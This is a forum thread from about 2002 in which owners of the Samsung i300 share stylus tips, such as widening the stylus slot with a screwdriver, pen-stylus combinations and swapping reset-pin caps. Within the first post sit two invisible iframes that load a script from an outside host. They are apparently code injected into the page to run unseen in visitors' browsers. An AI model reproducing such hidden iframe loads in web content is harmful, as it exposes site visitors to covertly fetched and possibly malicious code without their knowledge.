+ Reply to Thread
Page 1 of 2 1 2 LastLast

Lightbulb Tip- Alternative Stlyi

Did ya know - the I300 stylus slot is SLIGHTLY smaller than what's needed for a Palm V stylus. It fits, but it's just too snug for comfort. I've been using a Pentopia styus/ pen with my PalmV for years and I just couldn't go on without it (as sad as that sounds...).

So, being the determined SOB that I am (at least that's what my wife says), I went ahead and pursued slightly reaming out the stylus hole to fit the Palm V stylus..!... I ended up using a round-shank screwdriver to simply work it back and forth to ever so slightly oversize the whole. It took only a couple of minutes (once I found the right screwdriver..).

After trimming the pen clip on the Pentopia stylus, it fits great!

BTW, if you're really that interested, I used a Craftsman Torx size T10 screwdriver, part no. 41473. It was the perfect diameter and already had a semi-rough fiinish to the shank which worked like a slight abrasive in oversizing the hole.

And another thing, the oversizing is so slight that it should be considered normal wear. Therefore, it shouldn't affect any warranty concerns.

And I guess I should mention nowadays, that I disclaim any repsonsibility to anything you do to your own phone! Although this oversizing thing is very simple, there is bound to be someone that screws it up (likes drops the phone) while they're doing it. It ain't my fault, so don't contact me.

Obviously too much time on my hands....
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by crlipman; 01-06-2002 at 02:25 PM.

Smile Stylus Feature

I like the current Stylus.
    I really like the fact you can unscrew the top and it has a tip to reset the PDA.
    It would be nice if it had a pen though.

Really, the only reason I did this was for the pen. With my Palm V, there were too many times when having it was hugely helpful. I did loose the reset feature, though - even though the stylus has a reset button, it's too short for the i300's long reach....

does the i300 include a 2nd styli?

if not ill have to buy some more styli and jsut store the min my pack or something, because i ALWAYS lose pens or items resembling pens :p

the other day i bought 4 brand new sharpies for marking my CDs with, and ive lost them before i even got to use them.

Originally posted by Cicada
    does the i300 include a 2nd styli?

if not ill have to buy some more styli and jsut store the min my pack or something, because i ALWAYS lose pens or items resembling pens :p

the other day i bought 4 brand new sharpies for marking my CDs with, and ive lost them before i even got to use them.
    It comes with 2 Styli, and a batteries

I owned an M505 before purchasing my I300. I had a Landware floating point stylus for the 505. It is great. I found that I could screw the black top off the Landware stylus and replace it with the top off the I300 stylus including the reset pin. It fits great and is a tremendous improvement.

Originally posted by stevebtn
    I owned an M505 before purchasing my I300. I had a Landware floating point stylus for the 505. It is great. I found that I could screw the black top off the Landware stylus and replace it with the top off the I300 stylus including the reset pin. It fits great and is a tremendous improvement.
    Steve,

Can you provide a link or a photo to this Stylus?

Thanks!

Craig

Thanks!

...and to think. I had to wait 7 minutes for that!!!

Craig

I just ordered 2! Heh, the electric drill I used went right through! Who was that guy who said to do this!?! I'm suing!............

Disclaimer: For joke purposes only.

another alternative

I passed by Best Buy during lunch today and saw a stylus that doubles as a real pen. It replaces the Palm V stylus so with opening the hole on the i300 this one should work as well.

i300 knucklehead

Re: another alternative

Originally posted by tomv
    I passed by Best Buy during lunch today and saw a stylus that doubles as a real pen. It replaces the Palm V stylus so with opening the hole on the i300 this one should work as well.
    I have it for the m505 - it's the Pilot Chameleon, made by the Pilot pen company (who successfully sued Palm to remove the 'Pilot' from their product name). I was wondering if it would fit the i300 myself, since I am considering switching.

Thumbs up Re: Re: another alternative

Originally posted by patwoods

I have it for the m505 - it's the Pilot Chameleon, made by the Pilot pen company (who successfully sued Palm to remove the 'Pilot' from their product name). I was wondering if it would fit the i300 myself, since I am considering switching.
    This is the same brand I have. I used the PalmV size, which needed the hole, um, "resized". Other posts indicate that an m505 stylus fits fine without resizing...

My stylus had a clip on it which I had to remove, and, to fit better, I used a file to lop off a bit of the nub on the plastic pen cap, where the clip attached. This allowed the stylus to rest flush with the top of the i300.

Also, although the chameleon does have a reset pin, it is too short for the i300 - but I haven't needed to use it yet.... .

Anyway, having been using it for some time now, I really think this stylus really has helped with the usability of my i300.
    Cliff

thanks maalund... never noticed that about the stylus. now i dont have to get a damn pin to reset it.

-jet

Using existing cap

Has anyone here tried using the Samsung cap with any of the pen/stylus combinations. I am looking for one that will fit (with a little prodding, as it seems may be necessary) and that I can use the original cap with.

Yeah, this was discussed somewhere in the forum earlier.

I bought the Floating Point stylus and swapped caps, works great. Try doing a search for Floating Point, and see if that works. Otherwise, contact me and I will find you the site.

Craig
    I thought grafitti was illegal?

Landware pen??

Yes but I'd like a pen combo. I thought Landware made a stylus only.

My bad. I didn't notice the mention of "pen". :o

Craig
    I thought grafitti was illegal?

Re: Using existing cap

Originally posted by jgermuga
    and that I can use the original cap with.
    I know the chameleon won't, and my guess is that the others won't work either - the reset button in the cap extends into the body of the stylus, which is where the pen's ink is stored. So, there's no room for the orig cap's 'pin'.

the chameleon's built in reset pin extends from the body into the end cap so it fits. but, it's too short for the i300...
    Cliff

The floating point stylus is available from:

www.landware.com
    michaelb92